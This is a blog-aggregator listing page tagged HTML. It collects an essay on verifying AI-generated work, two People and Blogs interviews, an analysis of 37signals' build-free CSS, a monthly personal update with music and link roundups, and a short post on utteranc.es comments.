Posts in Html (20 found)
Higashi 3 days ago

AI should only run as fast as we can catch up

Recently I have spoke with two of my friends who all had fun playing with AI. Last month, I met with Eric, a fearless PM at a medium size startup who recently got into vibe coding with Gemini. After getting familiarized with Gemini, Eric was genuinely amazed by how AI quickly turns prompt into playable web applications. It served great purpose as a first prototype to communicate ideas to designers and engineers. But Eric really wanted to skip those steps and directly ship it to prod. But he couldn’t really understand that Gemini actually built a single-page HTML file that merely looks like a working app. Sadly, one cannot build a reliable enterprise product out of this. And there is really no effective way for Eric to catch up on these technical details and outpace the engineering team himself. Last week, I had coffee with Daniel, a senior staff engineer who recently grew fond of AI coding and found it to be the true force multiplier. Daniel was skeptical of AI at first, but lately he hasn’t wrote a single line of code for months already. What he does is just precisely prompt the AI to create new components in an existing framework (involving Kafka, postgres, AuthN/Z, and k8s infra stuff) and adhering to certain preexisting paradigms. He would just spot-check the correctness of AI’s work and quickly spin up local deployments to verify it’s indeed working. Later, he pushes the changes through code review process and lands those features. All without writing a single line of code and it’s production ready just as if he wrote them himself. To Daniel, building and shipping things fast and scalable is simpler than ever. After speaking with Eric and Daniel, I suddenly feel that there is an overarching theme around the use of AI that we can probably interpolate out of the stories here. And after pondering for a weekend, I think I can attempt to describe it now: it’s the problem of reliable engineering - how can we make AI work reliably . With the AI superpower, one can task it to do all crazy things on the internet with just typing a few lines of prompt. AI always thinks and learns faster than us, this is undeniable now. However, to make AI work actually useful (not only works, but reliable and trustworthy), we also need to catch up with what the AI does as quickly as possible. It’s almost like - we need to send the AI off to learn and think as fast as possible, but we also need to catch up as soon as possible to make it all relevant. And the speed we catch up things is critical to whether AI can help us effectively do these tasks. For the case of Daniel, he can spot-check and basically just skim through AI’s work and know for sure it’s doing the right thing with a few simple tests steps to verify, hence his results are more reliable. Whereas for Eric, he needs to basically learn software development from the bottom up to comprehend what the AI has done, and that really doesn’t give him the edge to outpace engineering teams to ship features reliably by himself. To generalize the problem again, I think for all the tasks we do, we can break them down into two parts: learning/creation and verification. Basically doing the task and checking if the task is done right. Interestingly, this gives us a good perspective to our relationship with AI on performing such tasks. Effort wise, if verification « learning/creation , one can very effectively check AI’s work and be confident about its reliability. If verification ~= learning/creation , one spends equal amount of time checking AI’s work. It’s not a big win, maybe AI becomes a good automation script to cut down some boilerplate. If verification » learning/creation , one cannot be sure about AI’s work that easily, and we are in the vibe-land. A very good example of the first category is image (and video) generation. Drawing/rendering a realistic looking image is a crazily hard task. Have you tried to make a slide look nicer? It will take me literally hours to center the text boxes to make it look “good”. However, you really just need to take a look at the output of Nano Banana and you can tell if it’s a good render or a bad one based on how you feel. The verification is literally instantaneous and effortless because it’s all encoded as feeling or vibes in your brain. “Does this look right?” probably can be answered in the span of milliseconds by your vision cortex. There is also no special knowledge required - human beings have been evaluating visual images since birth , hardwired into our instincts. The significant cost asymmetry can greatly explain why AI image generation exploded. If we can look for similar scenarios, we can probably identify other “killer” use cases of AI as well. However, if we go down into the bottom of the spectrum where verification becomes more intense - requiring domain knowledge, technical expertise, industry know-hows to tell if the AI is producing slop or not, we will enter this dark age of piling verification debt. More things are being created, but we are lagging behind to check if any of it actually works to our satisfaction. If an organization keeps vibe-coding without catching up with verification, those tasks can quickly end up as “debts” that needs to be verified. When verification becomes the bottleneck, dangerous things can happen if we still want to move fast - we will risk ourselves running unverified code and having unexpected side effects that are yet to be validated. It can also apply to other fields - imagine asking AI to craft a new vaccine and you don’t want to wait for FDA to use it. I’ve come across a few blog posts that talks about Verification Debt already. I think it’s genuinely a good problem for technical leaders to have in their mind in this era. AI can only reliably run as fast as we check their work. It’s almost like a complexity theory claim. But I believe it needs to be the case to ensure we can harvest the exponential warp speed of AI but also remain robust and competent, as these technologies ultimate serve human beings, and us human beings need technology to be reliable and accountable, as we humans are already flaky enough ;) This brings out the topic of Verification Engineering. I believe this can be a big thing after Context Engineering (which is the big thing after Prompt Engineering). By cleverly rearranging tasks and using nice abstractions and frameworks, we can make verification of AI performed tasks easier and use AI to ship more solid products the world. No more slop. I can think of a few ideas to kickoff verification engineering: I believe whoever figures out ways to effectively verify more complex tasks using human brains, can gain the most benefit out of the AI boom. Maybe we need to discard traditional programming languages and start programming in abstract graph-like dataflow representations where one can easily tell if a thing is done right or wrong despite its language or implementation details. Maybe our future is like the one depicted in Severance - we look at computer screens with wiggly numbers and whatever “feels right” is the right thing to do. We can harvest these effortless low latency “feelings” that nature gives us to make AI do more powerful work. How to craft more technicall precise prompts to guide AI to surgically do things, rather than vibing it. How to train more capable technical stakeholders who can effectively verify and approve what AI has done. How to find more tasks that are relatively easy to verify but rather hard to create. How to push our theoretical boundaries of what things we can succinctly verify (complexity theory strikes again).

0 views
Manuel Moreale 5 days ago

Stephanie Stimac

This week on the People and Blogs series we have an interview with Stephanie Stimac, whose blog can be found at blog.stephaniestimac.com . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Lou Plummer and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. I’m Stephanie Stimac, a product manager and designer from Seattle, WA but I currently live in a small town in England. My background is in visual and web design, and I graduated at a weird time in terms of web tech. A good portion of my final year of university was spent learning about how to build websites in Flash and when I graduated, Flash quickly became obsolete, but I had a bit of HTML and CSS knowledge which helped me advance through my career. I was doing purely design work for the first part of my career before I joined the Microsoft Edge Web Platform team, where I started doing a handful of other things that were product management and developer relations adjacent. I’ve spec’d out features, analyzed data and user flows, created content for social media, performed user research to identify developer paint points, given conference talks, the list goes on. I left Microsoft for a startup that moved me to Berlin but that was unfortunately short lived due to the company folding rather quickly after hiring 100+ people. Now I live in England with my husband and work for Igalia, a technology consultancy, and I’m back in the Web Platform space. It’s sort of like my role at Microsoft but less product and more project focused. In between all this, I wrote a book that was published in 2023 called Design for Developers. It’s an evergreen guide to the basics of visual and UX design for web developers. I’m a collector of hobbies but my focus lately has been reading, baking, photography, printmaking and creating content. I’m a mountain biker and love to hike as well as paddle board. I’ve also gotten into birding in the last year or so. There are so many different kinds, it’s incredible. Depends on which blog you’re talking about! I’ve been blogging since about 2003 when I had a LiveJournal in high school. That evolved into a blogging and sharing about college life on Wordpress around 2008/2009 and went through a few iterations before I landed on the name The Hermes Homestead. I no longer blog there but am in the process of starting that sort of lifestyle blogging again and am building a new site with Astro and Netlify. As for my more technical and design focused blog, I started that in 2019 about 3 years into my career at Microsoft. I wanted a space to talk about CSS, design and web browser things. This is my most visited blog, and it is attached to my personal website and portfolio though I called it “The Web Witch’s Blog” for a long time – now there’s just a cauldron with a code mark. It’s been through a few redesigns. It was very basic in terms of styling for the longest time. I’ve slowly made incremental improvements to things over the years, but this year I did a larger redesign to try and capture a bit of my witchy vibe and wanted to include more visuals, some subtle animations and view transitions. There are a few different types of ways I post. I was doing monthly updates just covering things I had learned, big life events, what media I consumed in a month, books I read. I haven’t done this in a few months as I’m currently pregnant and was feeling burned out on everything. I’m sure I’ll pick those up again soon. I’ll also post about major career or life events. Other posts are inspired by things I’ve experienced, for example I’m in the process of writing about the worst onboarding experience I have ever had with a credit card and the brand’s website and app. Nothing quite inspires me like a poor user experience, and I hope in sharing those experiences other people will be inspired to make sure whatever user experience they’re designing isn’t terrible. I’m also not afraid to share my terrible experiences working in tech, whether that’s about encountering conference line ups that are all men or finding out my book was scraped by Meta’s AI. I also write about new CSS features that web developers can use but I have to want to write about these, so they usually need to have some sort of design focus or benefit. Those are sort of the three main categories I center posts around at the moment, but generally if it fits into general life and career, I’ll write about it. When it comes to writing the actual post, I usually just write straight in VS Code in a markdown file. I try to proofread in VS Code but I need a new spelling and grammar extension as I end up missing a few mistakes that I’ll correct as soon as I see them. Recently, I’ve started copying text over to Microsoft Word just for a quick visual to catch any misspellings. Then I hit publish. I rarely have someone else look over a post unless I am writing about something I’m little unsure about or if I’m talking about the company I work for. I don’t want to misrepresent them. Overall, my process is kind of like writing for a diary. I don’t really overthink what I’m writing about and just post it. That being said, I often come up with many ideas for things to write about, but it really depends on the type of mental space I’m in whether those get finished or not. I have a pile of started but unfinished drafts. For writing, I usually have to be at home or in a quiet space with some music. Sometimes I can write when I’m out at the coffee shop, but it is very dependent on the coffee shop and how busy it is. Physical spaces 100% influence my creativity and just overall mood and wellbeing. I like to be in a space that inspires me, surrounded by things that inspire me. I have a hard time focusing if there’s a mess or I’m in a space that doesn’t speak to me. I like to be surrounded by an environment that has a vibe or a point of view. I work from home so most of my work happens there. My husband and I have been in the process of slowly upgrading our home to be a space we enjoy being in. It’s been a slow process over the last two years, and we’re still making changes but it’s getting there and there are spots in our home I’m starting to love. But it’s also important to change up the scenery occasionally, so we’ll go out and work from coffee shops some mornings, otherwise I get stir crazy. I also use a combination of digital and analog tools to keep track of things. I have a bullet journal I fill out every week with my calendar and personal to-do list, and I have what I consider a digital bullet journal for all my work stuff in Notion that’s formatted nicely. I do have a digital bullet journal for personal stuff I’m also starting to use again, which is helpful when I have a lot of long-term plans in the works. For the technical blog, it’s hosted on Netlify and I’m using 11ty. The domain used to be registered with GoDaddy but I’ve been migrating all my domains over to Namecheap because I find some of GoDaddy’s practices predatory or less than user friendly. The old lifestyle blog is on Wordpress and is still hosted on GoDaddy, and I’m probably going to end up paying someone to migrate it all to Namecheap for me because my migration attempts have been headache inducing. I want to keep the blog up even if it’s not active, but I’m tired of paying an exorbitant amount just for an SSL certificate compared to other providers. I think it’s criminal GoDaddy charges you the amount they do for SSL when you get an SSL certificate for free. The new lifestyle blog will be hosted on Netlify (like most of my websites), with a Namecheap domain, and I’m building it with Astro. For the technical blog, no I wouldn’t change anything. It’s tied to my name and career. I’m happy with Netlify and 11ty. For the lifestyle blog, I wouldn’t use Wordpress again. It has its benefits but for the functionality I want and need, I think it’s overkill for what I personally am trying to achieve. I like having more control over the layout and design and I’m happy to be building the new one with Astro. As for the name, I only wish I had chosen something that was a bit more open instead of something that was so aligned to a specific period of my life (The Hermes Homestead). It doesn’t fit where I’m at anymore, but I feel like the new name is more open and maybe starting with a fresh slate isn’t so bad. If I combine everything, I think it’s about $350 a year for all my blogs including URLs and hosting but I expect that to be reduced significantly once I move everything away from GoDaddy. (For reference, I just got an email from them telling me that my SSL for one of the URLs I’m letting expire won’t renew and they want £90 a year just for the SSL certificate.) On the technical blog, I do generate a little bit of revenue but not a lot. I sometimes include affiliate links, and I do run ads on the homepage, but it is one spot in the sidebar. I don’t want an intrusive experience with ads because there’s nothing I hate more than landing on a page that is so covered in ads you can’t navigate through the page (looking at all you food blogs.) I was recently on a food blogger’s page and went to the print recipe page to try and read the instructions more easily and they had even put ads on the print page. I don’t want to replicate that experience, so I try to keep things as minimal as possible. I really don’t mind if people are trying to monetise their content unless it’s so overwhelming full of ads that I can’t view the content. At the end of the day, I don’t know what a person’s situation is, and we live in a rather precarious and unstable time for many people when it comes to employment. Monetising could help someone reach a goal more quickly or give them a little more freedom or room to breathe in their budget. I’ve been given product in exchange for writing a review and I don’t mind that kind of partnership. I think affiliate links are a great way to monetise without being intrusive. I use Carbon Ads for my technical blog and don’t mind their style because it’s very minimal. In terms of supporting other bloggers, I’ll click an affiliate link or engage with their content but I’m not currently paying anyone via Patreon or a subscription, though I have in the past. I love Henry Desroches’ content over on henry.codes and stillness.digital . Olu Niyi-Awosusi also has a lovely blog over at olu.online and I love reading their work. Maggie Appleton’s Garden is also full of incredible writing. If you’re a developer trying to level up your skills outside of code, my book Design for Developers, is available on Amazon and Manning . My colleagues host an interesting podcast that covers a range of technology topics called Igalia Chats . On the more casual side of things, I’ve been vlogging and trying to improve my video editing abilities over on YouTube . Typically sharing my life in England and more style focused content over there. And a final shoutout to my husband, who is constantly building absolutely wild things with CSS. He’s working on getting his blog up but for now he’s got a few links on his website . Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 118 interviews . Make sure to also say thank you to Manton Reece and the other 127 supporters for making this series possible.

1 views
Rob Zolkos 1 weeks ago

Vanilla CSS is all you need

Back in April 2024, Jason Zimdars from 37signals published a post about modern CSS patterns in Campfire . He explained how their team builds sophisticated web applications using nothing but vanilla CSS. No Sass. No PostCSS. No build tools. The post stuck with me. Over the past year and a half, 37signals has released two more products (Writebook and Fizzy) built on the same nobuild philosophy. I wanted to know if these patterns held up. Had they evolved? I cracked open the source code for Campfire, Writebook, and Fizzy and traced the evolution of their CSS architecture. What started as curiosity became genuine surprise. These are not just consistent patterns. They are improving patterns. Each release builds on the last, adopting progressively more modern CSS features while maintaining the same nobuild philosophy. These are not hobby projects. Campfire is a real-time chat application. Writebook is a publishing platform. Fizzy is a full-featured project management tool with kanban boards, drag-and-drop, and complex state management. Combined, they represent nearly 14,000 lines of CSS across 105 files. Not a single line touches a build tool. Let me be clear: there is nothing wrong with Tailwind . It is a fantastic tool that helps developers ship products faster. The utility-first approach is pragmatic, especially for teams that struggle with CSS architecture decisions. But somewhere along the way, utility-first became the only answer. CSS has evolved dramatically. The language that once required preprocessors for variables and nesting now has: 37signals looked at this landscape and made a bet: modern CSS is powerful enough. No build step required. Three products later, that bet is paying off. Open any of these three codebases and you find the same flat structure: That is it. No subdirectories. No partials. No complex import trees. One file per concept, named exactly what it does. Zero configuration. Zero build time. Zero waiting. I would love to see something like this ship with new Rails applications. A simple starting structure with , , , and already in place. I suspect many developers reach for Tailwind not because they prefer utility classes, but because vanilla CSS offers no starting point. No buckets. No conventions. Maybe CSS needs its own omakase. Jason’s original post explained OKLCH well. It is the perceptually uniform color space all three apps use. The short version: unlike RGB or HSL, OKLCH’s lightness value actually corresponds to perceived brightness. A 50% lightness blue looks as bright as a 50% lightness yellow. What is worth noting is how this foundation remains identical across all three apps: Dark mode becomes trivial: Every color that references these primitives automatically updates. No duplication. No separate dark theme file. One media query, and the entire application transforms. Fizzy takes this further with : One color in, four harmonious colors out. Change the card color via JavaScript ( ), and the entire card theme updates automatically. No class swapping. No style recalculation. Just CSS doing what CSS does best. Here is a pattern I did not expect: all three applications use units for horizontal spacing. Why characters? Because spacing should relate to content. A gap between words feels natural because it is literally the width of a character. As font size scales, spacing scales proportionally. This also makes their responsive breakpoints unexpectedly elegant: Instead of asking “is this a tablet?”, they are asking “is there room for 100 characters of content?” It is semantic. It is content-driven. It works. Let me address the elephant in the room. These applications absolutely use utility classes: The difference? These utilities are additive , not foundational. The core styling lives in semantic component classes. Utilities handle the exceptions: the one-off layout adjustment, the conditional visibility toggle. Compare to a typical Tailwind component: And the 37signals equivalent: Yes, it is more CSS. But consider what you gain: If there is one CSS feature that changes everything, it is . For decades, you needed JavaScript to style parents based on children. No more. Writebook uses it for a sidebar toggle with no JavaScript: Fizzy uses it for kanban column layouts: Campfire uses it for intelligent button styling: This is CSS doing what you used to need JavaScript for. State management. Conditional rendering. Parent selection. All declarative. All in stylesheets. What fascinated me most was watching the architecture evolve across releases. Campfire (first release) established the foundation: Writebook (second release) added modern capabilities: Fizzy (third release) went all-in on modern CSS: You can see a team learning, experimenting, and shipping progressively more sophisticated CSS with each product. By Fizzy, they are using features many developers do not even know exist. CSS Layers solve the specificity wars that have plagued CSS since the beginning. It does not matter what order your files load. It does not matter how many classes you chain. Layers determine the winner, period. One technique appears in all three applications that deserves special attention. Their loading spinners use no images, no SVGs, no JavaScript. Just CSS masks. Here is the actual implementation from Fizzy’s : The keyframes live in a separate file: Three dots, bouncing in sequence: The means it automatically inherits the text color. Works in any context, any theme, any color scheme. Zero additional assets. Pure CSS creativity. The default browser element renders as a yellow highlighter. It works, but it is not particularly elegant. Fizzy takes a different approach for search result highlighting: drawing a hand-drawn circle around matched terms. Here is the implementation from : The HTML structure is . The empty exists solely to provide two pseudo-elements ( and ) that draw the left and right halves of the circle. The technique uses asymmetric border-radius values to create an organic, hand-drawn appearance. The makes the circle semi-transparent against the background, switching to in dark mode for proper blending. Search results for: webhook No images. No SVGs. Just borders and border-radius creating the illusion of a hand-drawn circle. Fizzy and Writebook both animate HTML elements. This was notoriously difficult before. The secret is . Here is the actual implementation from Fizzy’s : The variable is defined globally as . Open Dialog This dialog animates in and out using pure CSS. The rule defines where the animation starts from when an element appears. Combined with , you can now transition between and . The modal smoothly scales and fades in. The backdrop fades independently. No JavaScript animation libraries. No manually toggling classes. The browser handles it. I am not suggesting you abandon your build tools tomorrow. But I am suggesting you reconsider your assumptions. You might not need Sass or PostCSS. Native CSS has variables, nesting, and . The features that needed polyfills are now baseline across browsers. You might not need Tailwind for every project. Especially if your team understands CSS well enough to build a small design system. While the industry sprints toward increasingly complex toolchains, 37signals is walking calmly in the other direction. Is this approach right for everyone? No. Large teams with varying CSS skill levels might benefit from Tailwind’s guardrails. But for many projects, their approach is a reminder that simpler can be better. Thanks to Jason Zimdars and the 37signals team for sharing their approach openly. All code examples in this post are taken from the Campfire, Writebook, and Fizzy source code. For Jason’s original deep-dive into Campfire’s CSS patterns, see Modern CSS Patterns and Techniques in Campfire . If you want to learn modern CSS, these three codebases are an exceptional classroom. Native custom properties (variables) Native nesting Container queries The selector (finally, a parent selector) CSS Layers for managing specificity for dynamic color manipulation , , for responsive sizing without media queries HTML stays readable. tells you what something is, not how it looks. Changes cascade. Update once, every button updates. Variants compose. Add without redefining every property. Media queries live with components. Dark mode, hover states, and responsive behavior are co-located with the component they affect. OKLCH colors Custom properties for everything Character-based spacing Flat file organization View Transitions API for smooth page changes Container queries for component-level responsiveness for entrance animations CSS Layers ( ) for managing specificity for dynamic color derivation Complex chains replacing JavaScript state

0 views
fLaMEd fury 1 weeks ago

Ain't Enough To Go 'Round In This World

What’s going on, Internet? December crept up fast and suddenly it’s twenty three days until Christmas. I’ve been enjoying getting out more and seeing live music. There’s so much more happening up here in Auckland and it has been good getting back into gigs. I started the month with Tom Scott’s Anitya show at the Civic . A week later I questioned my own sanity by going out to another gig with some wonderful friends on a Tuesday night right before flying to Sydney for the first of two work trips. Sydney was great. It was good catching up with and see work mates in person, but also mentally exhausting. Flying back to Auckland for the weekend added to the fatigue, but I liked the change of pace. I even managed to catch up with some of my cousins and aunt for dinner. Having the chance to do that on work trips is a nice bonus. Meanwhile the house hunting and weekends of endless open homes finally came to an end. My wife viewed a place while I was in Sydney and pushed it through the offer stage. The offer was accepted conditionally before I’d even seen the house. We went unconditional a week later and only then did I walk through it for the first time. After more than sixty open homes this year, buying a place that needs work makes more sense for us than blowing our budget on something “liveable” but missing basics like linen cupboards, wardrobes, or a proper laundry. This way we get to shape it how we want. I’m excited for the new year. While catching up and surfing the web, one particular link making the rounds that claimed personal websites are dead, which I obviously disagree with and replied to . Finally, I finished up my Firefox Container configuration and shared it for anyone to try out . Let me know if you found the container setup useful. With all that going on, I still found time to watch a bunch of shows, listen to a lot of music, pick up tonne of new records, and make a few updates around the site. Here’s November in full. I watched a bunch of episodes on the flights back and forth from Sydney. No movies this month. What happened there. I carried on with The Chair Company, which wrapped up its first season yesterday. Such a bizarre show. No idea when the next season is coming but I’ll be sticking with it. I finished Andor season 3. What a damn good show. I’ve got Rogue One queued up to wrap up the story, even though I’ve already seen it three times. I’m still watching South Park. It’s fun, but I’m tired of the White House plot line (I’m sure Matt & Trey are too). I miss the boys just being kidsw. I’ll probably go back to season 1 soon to remind myself how the show has changed and evolved over the years. Some absolute classic episodes around seasons 6-7. Plu1bus caught my attention and I’m working through it as episodes release. Interesting premise and am enjoying watching the story unfold. On the flight I spotted the UK show Dope Girls and gave it a go. I forgot about it once I landed, but I’ll finish the remaining four episodes soon now that writing this post has reminded me. I started and finished season 2 of The Vince Staples Show. It leans into the same bizarre energy as later seasons of Atlanta. Low stakes, easy to watch, and fun. I also started Educators. Silly, very New Zealand, and perfect fifteen minute episodes when I don’t want to think and have an awkward laugh. I got through three books this month. Gabriel’s Bay by Catherine Robertson was a solid read with plenty of local flavour and a warm story. 7th Circle kept me hooked as it pushed further into the Shadow Grove universe I got into last year reading through the Maddison Kate books. I’m fully here for the messy plotlines and the drama threaded between the raunchy sex scenes. I’m here for it. I also read Atmosphere by Taylor Jenkins Reid. Her books are always epically tragic and beautiful at the same time, and this one absolutely delivered on both fronts. Trying to decide if I want to read the rest of the 7th Circle books this month or dive into something heavier like Project Hail Mary. This month saw my usual mix of pop, hip hop, and early-2000s. Mokomokai ended up as my top artist of the month, with Olivia Rodrigo, D12, Tadpole, Eminem, and Westside Gunn all getting steady playtime. Top albums were a mix - SOUR by Olivia Rodrigo at the top, followed by Tadpole’s The Buddhafinger, Mokomokai’s latest release PONO!, and both Heels Have Eyes records from Westside Gunn. MGK’s Tickets to My Downfall also crept back into rotation with the (All Access) release of five new tracks to the orignal album. MGK has a gig here next year - do I want to go see him in concert? I mean I like Tickets To My Downfall but think he’s a ballbag. Dilemas. Track of the month was “Verona” by Elemeno P, with “Kitty” by The Presidents of the United States of America, (thanks to riding in the car with my son) and a few Olivia Rodrigo singles scattered through the top ten. Mokomokai showed up again with “Roof Racks”, because sometimes I’m just in the mood for something agressive. November 2025 saw my largest vinyl haul ever. I took advantage of the 20 percent off vinyl sale at JB Hi-Fi, burned through a stack of saved vouchers, and grabbed a few special pieces elsewhere. The links are a bit of a mix this month and there’s a lot of them. Enjoy. Not a huge month for website work. I fixed up some CSS, finished rolling out categories and tags across all my posts, and cleaned up a few lingering bits of front-matter. I still need to build the individual category pages and rethink how this data is displayed on the posts index and on each post. The posts page itself needs a refresh too. I’m not loving the masonry card layout anymore. This update was brought to you by Alright by Tadpole Hey, thanks for reading this post in your feed reader! Want to chat? Reply by email or add me on XMPP , or send a webmention . Check out the posts archive on the website. Tom Scott – Anitya from the gig MOKOMOKAI – PONO , WHAKAREHU , and Mokomokai all direct from their website in a special bundle which included the last remaining copies of the Mokomokai Vinyl 1st pressing in Red & Black Marble Fleetwood Mac – Rumours — JB Hi-Fi Eminem – The Slim Shady LP (Expanded Edition) — JB Hi-Fi Stellar* – Mix — JB Hi-Fi Tadpole – The Buddhafinger , and The Medusa — JB Hi-Fi D12 – Devil’s Night (IVC Edition) — Interscope Vinyl Collective, orange variant with posters and D12 sticker in a beaufiful, heavy gatefold sleeve The psychological cost of having an RSS feed Filip explores the anxiety that comes with writing a blog knowing it has an RSS feed. My first months in cyberspace Phil Gyford remembers the excitement and optimism of being online in 1995. Steps Towards a Web without The Internet AJ Roach imagines a web that could exist without the internet, built from small, local networks instead of centralised infrastructure. Should Your Indieweb Site Be Mobile Friendly? MKUltra.Monster experiments with making old-web design mobile-friendly without losing its classic feel. I ❤ shortcuts #3: read a random blog post Hyde shares a neat script to help randomly surf the independent web. In Praise of RSS and Controlled Feeds of Information rkert writes about why syndication still matters and how sharing content across the open web helps sites stay connected. Who’s a blog for? Cobb thinks through who a blog is really for and why writing for yourself remains the most sustainable approach. Maintaining a Music Library, Ten Years On Brian Schrader reflects on maintaining his personal music library over a decade and why owning your collection still matters. ChatGPT’s Atlas: The Browser That’s Anti-Web - Anil Dash Anil Dash argues that Atlas isn’t just an unusual browser but an anti-web tool that strips context from sites and traps users in a closed, distorted version of the internet. I know you don’t want them to want AI, but… - Anil Dash Anil Dash questions how we should react to Firefox adding AI features. He suggests die-hard fans need to look past the knee-jerk outrage and ask whether Firefox is actually trying to offer a safer, more privacy-minded version of tools their non-technical friends are already using. Early web memories - roundup post Winther rounds up early web memories from the recent Bear Blog Carnival - gutted I missed this as it was happening! Blogs used to be very different. Jetgirl looks back at how blogs used to work, from tight-knit communities to slower, more personal writing, and how different that feels compared to today. PicoSSG Pico is a tiny static site generator focused on simplicity, giving you a lightweight way to build plain HTML sites without a full framework. Personal blogs are back, should niche blogs be next? Disassociated writes about the return of personal blogs and why niche blogs might be the next wave as people move away from algorithmic platforms. Feeds and algorithms have freed us from personal websites Disassociated pushes back on the idea that platform feeds are “good enough,” arguing that treating Medium profiles as websites misses the point, and that personal sites still matter because they give you control rather than renting space inside someone else’s algorithm. Small Web, Big Voice Afranca writes about how the small web still carries real weight, showing that personal sites and hand-built spaces can have a bigger impact than their size suggests. How to Protect Your Privacy from ChatGPT and Other Chatbots Mozilla explains how to protect your privacy when using ChatGPT and other AI tools, focusing on data control, account settings, and reducing what these systems can collect about you.

0 views
Kix Panganiban 1 weeks ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments -- but I'm not a huge fan of either of them: Then I realized that there's a great alternative that I've used in the past: utteranc.es . Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to Github Issues in a Github repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below: Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine but I prefer something that looks a little neater. Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have 1 Komments page per blog post, or even 1 Komments page for your entire blog.

0 views
Manuel Moreale 1 weeks ago

Karen

This week on the People and Blogs series we have an interview with Karen, whose blog can be found at chronosaur.us . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Pete Millspaugh and the other 127 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hello! My name is Karen. I work in IT support for a large company’s legal department, and am currently working on my Bachelors in Cybersecurity and Information Assurance. I live near New Orleans, Louisiana, with my husband and two dogs - Daisy, A Pembroke Welsh Corgi, and Mia, a Chihuahua. Daisy is The Most Serious Corgi ever (tm), and Mia has the personality of an old lady who chain smokes, plays Bingo every week at the rec center, and still records her soap operas on a VHS daily. My husband is an avid maker (woodworking and 3D printing, mostly), video gamer, and has an extensive collection of board games that takes up the entire back wall of our livingroom. As for me, outside of work, I’m a huge camera nerd and photographer. I love film photography, and recently learned how to develop my own negatives at home! I also do digital - I will never turn my nose up at one versus the other. I’ve always been into assorted fandoms, and used to volunteer at local sci-fi/fantasy/comic conventions up to a few years ago. I got into K-Pop back in 2022, and am now an active participant in the local New Orleans fan community, providing Instax photo booth services for events. I’ve also hosted K-Pop events here in NOLA as well. My ult K-Pop group is ATEEZ, but I’m a proud multi fan and listen to whatever groups or music catch my attention, including Stray Kids, SHINee, and Mamamoo. I also love 80s and 90s alternative, mainly Depeche Mode, Nine Inch Nails, and Garbage. And yes, I may be named Karen but I refuse to BE a “Karen”. I don’t get upset when people use the term, I find it hilarious. So I have been blogging off and on since 2001 or so - back when they were still called “weblogs” and “online journals”. Originally, I was using LiveJournal, but even with a paid account, I wanted to learn more customization and make a site that was truly my own. My husband - then boyfriend - had their own server, and gave me some space on it. I started out creating sites in Microsoft Frontpage and Dreamweaver (BEFORE Adobe owned them!), and moved to using Greymatter blog software, which I loved and miss dearly. I moved to Wordpress in - 2004 maybe? - and used that for all my personal sites until 2024. I’d been reading more and more about the Indieweb for a while and found Bear , and I loved the simplicity. I’ve had sites ranging from a basic daily online journal, to a fashion blog, to a food blog, to a K-Pop and fandom-centric blog, to what it is today - my online space for everything and anything I like. I taught myself HTML and CSS in order to customize and create my sites. No classes, no courses, no books, no certifications, just Google and looking at other people’s sites to see what I liked and how they did it. My previous job before this one, I was a web administrator for a local marketing company that built sites using DNN and Wordpress, and I’m proud to say that I got that job and my current one with my self-developed skills and being willing to learn and grow. I would not be where I am today, professionally, if it wasn’t for blogging. I’ll be totally honest - I don’t have a writing process. I get inspiration from random thoughts, seeing things online, wanting to share the day-to-day of my life. I don’t draft or have someone proof read, I just type out what I feel like writing. When I had blogs focusing on specific things - plus size fashion and K-Pop, respectively - I kept a list of topics and ideas to refer back to when I was stuck for ideas. That was when I was really focused on playing the SEO and search engine algorithm game, though, where I was trying to stick to the “two-three posts a week” rule in an attempt to boost my search engine results. I don’t do that now. I do still have a list of ideas on my phone, but it’s nothing I am feeling FORCED to stick to. It’s more along the lines of that I had an idea while I was out, and wanted to note it so I don’t forget. Memory is a fickle thing in your late 40s, LOL. My space absolutely influences my mindset for writing. I prefer to write in the early morning, because my brain operates best then. (I know I am an exception to the rule by being an early bird.) I love weekend mornings when I can get up really early and settle into my recliner with my laptop and coffee, and just listen to some lofi music and just feel topics and ideas out. I also made my office/guest bedroom into a cozy little space, with a daybed full of soft blankets and fluffy pillows and cushions, and a lap desk. In all honesty, my preferred location to write is at a coffeeshop first thing in the morning. I love sitting tucked in a booth with a coffee and muffin, headphones on and listening to music, when the sun is just on the cusp of rising and the shop is still a little too chilly. That’s when the creative ideas light up the brightest and the synapses are firing on all cylinders. Currently, my site is hosted on Bear . I used to be a self-hosted Wordpress devotee, but in mid-late 2024, I got really tired of the bloat that the apps had become. In order to use it efficiently for me, I had to install entirely too many plugins to make it “simpler”. (Shout-out to the Indieweb Wordpress team, though - they work so hard on those plugins!) Of course, the more plugins you have, the less secure your site… My domain is registered through Hostinger . To write my posts, I use Bear Markdown Notes. I heard about this program after seeing a few others talking about using it for drafts, notes, etc. I honestly don’t think I’d change much! I really love using Bear Blog. It reminds me of the very old school LiveJournal days, or when I used Greymatter. It takes me back to the web being simpler, more straightforward, more fun. I also like Bear’s manifesto , and that he built the service for longevity . I would probably structure my site differently, especially after seeing some personal sites set up with more of a “digital garden” format. I will eventually adjust my site at some point, but for now, I’m fine with it. (That and between school and work, it’s kind of low on the priority list.) I purchased a lifetime subscription to Bear after a week of using it, which ran around $200 - I don’t remember exactly. I knew that I was going to be using the service for a while and thought I should invest in a place that I believed in. My Hostinger domain renewals run around $8.99 annually. My blog is just my personal site - I don’t generate any revenue or monetise in any way. I don’t mind when people monetize their site - it’s their site and they can do what they choose. As long as it’s not invading others’ privacy or harmful, I have absolutely no issue. Make that money however you like. Ooooh I have three really good suggestions for both checking out and interviewing! Binary Digit - B is kind of an influence for me to play with my site again. They have just this super cool and early 2000s vibe and style that I really love. Their site reminds me of me when I first started blogging, when I was learning new things and implementing what I thought was cool on my site, joining fanlistings, making new online friends. Kevin Spencer - I love Kevin’s 